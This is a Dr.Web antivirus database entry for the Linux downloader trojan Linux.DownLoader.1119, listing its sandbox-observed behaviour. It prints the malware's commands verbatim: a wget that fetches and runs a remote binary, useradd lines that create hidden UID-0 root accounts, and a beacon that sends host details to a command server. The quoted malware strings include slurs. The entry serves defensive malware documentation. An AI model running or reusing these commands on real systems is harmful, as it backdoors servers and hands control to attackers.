JavaScript support is required for our site to be fully operational in your browser.
Linux.DownLoader.1119
Added to the Dr.Web virus database:
2019-06-14
Virus description added:
2019-06-14
Technical Information
Malicious functions:
Removes itself
Launches processes:
bash
wget -q http://thebestperlscripts.cf/.../os -O protections
chmod 777 protections
./protections
tr -d ./
clear
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os
nscd -i passwd
nscd -i group
passwd system
passwd os
grep -Ew #Port|Port /etc/ssh/sshd_config
head -n1
awk {print $2}
lsb_release -d
awk {$1= \"\"; print $0}
nproc --all
free -mt
grep Total:
wget -qO- http://5.135.9.132/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=22&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS= Debian GNU/Linux 8.3 (jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
Performs operations with the file system:
Modifies file access rights:
/root/protections
/etc/passwd+
/etc/shadow+
/etc/subuid+
/etc/subgid+
/etc/nshadow
Creates symlinks:
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/shadow.lock
Creates or modifies files:
/root/protections
/etc/.pwd.lock
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/passwd-
/etc/passwd+
/etc/shadow-
/etc/shadow+
/etc/subuid-
/etc/subuid+
/etc/subgid-
/etc/subgid+
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
/etc/nshadow
Deletes files:
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/shadow.lock
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
Network activity:
Establishes connection:
HTTP GET requests:
th#######rlscripts.cf/.../os
http://#.###.#.##########################.#####################HECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=%20Debian%20GNU/Linux%208.3%20(jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
DNS ASK:
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK